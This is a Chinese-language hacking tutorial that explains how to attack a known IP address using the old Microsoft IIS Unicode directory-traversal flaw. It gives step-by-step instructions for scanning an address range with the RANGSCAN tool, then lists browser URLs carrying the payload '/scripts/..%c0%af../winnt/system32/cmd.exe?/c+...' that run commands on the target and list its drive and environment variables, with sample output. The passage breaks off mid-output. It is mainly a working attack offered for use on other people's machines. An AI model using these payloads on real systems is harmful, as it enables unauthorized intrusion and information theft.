知道对方IP如何攻击

如何IP 攻击 （1） UNICODE 漏洞入侵 ―Uicode漏洞‖是微软IIS 的一个重大漏洞。2001年最热门漏洞之一。 第一步，运行 RANGSCAN 扫描器，会出现扫描窗口，在最上面有两个from 的横框，这是让你填一段 IP 范围的。在第一个框里填入启始域（打个比方，比如你要扫192.168.0.1至192.168.0.255）那么你在第一个框里就填入192.168.0.1，在 to 后面的框里填入192.168.0.255 意思就是扫192.168.0.0至192.168.0.255这段范围里有 UNICODE 漏洞的机器。接着在中间有一个添加的横框，是要填入内容的如： /scripts/..%c0%af../winnt/system32/cmd.exe 这句话的意思是扫描有 %c0%af 漏洞的机器，对象一般是英文的WIN2000机。 我们把/scripts/..%c0%af../winnt/system32/cmd.exe 填入框里，再按一下添加。再按―扫描‖。就看到 RANGSCAN 开始扫了。这时就要看你选的IP 范围有漏洞的机器多不多了，如果你选的IP 范围好，呵，很快在扫描结果框里就会显示扫到的漏洞主机 如192.168.0.111/scripts/..%c0%af../winnt/system32/cmd.exe 意思是192.168.0.111主机有 %c0%af 漏洞， 目标有了，我们马上打开浏览器。在网址栏里输入： 100.100.100.111/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ 回车 意思是查看机器里 C 盘的根目录。一般情况下，我们都可以在浏览器里看到类似如： Directory of c:\ 2002-03-13 03:47p 289 default.asp 2002-02-11 03:47p 289 default.htm 2002-03-09 04:35p Documents and Settings 2002-02-11 03:47p 289 index.asp 2002-02-11 03:47p 289 index.htm 2002-05-08 05:19a Inetpub 2002-01-19 10:37p MSSQL7 2002-03-09 04:22p Program Files 2002-01-23 06:21p WINNT 4 File(s) 1,156 bytes 5 Dir(s) 2,461,421,568 bytes free ------------------------------ 的目录列表。也会碰到看不到文件的空目录。 好，我们成功看到了机器里的C 盘了。 我们在浏览器里输入： 192.168.0.111/scripts/..%c0%af../winnt/system32/cmd.exe?/c+set 回车 CGI Error The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are: ALLUSERSPROFILE=C:\Documents and Settings\All Users CommonProgramFiles=C:\Progr...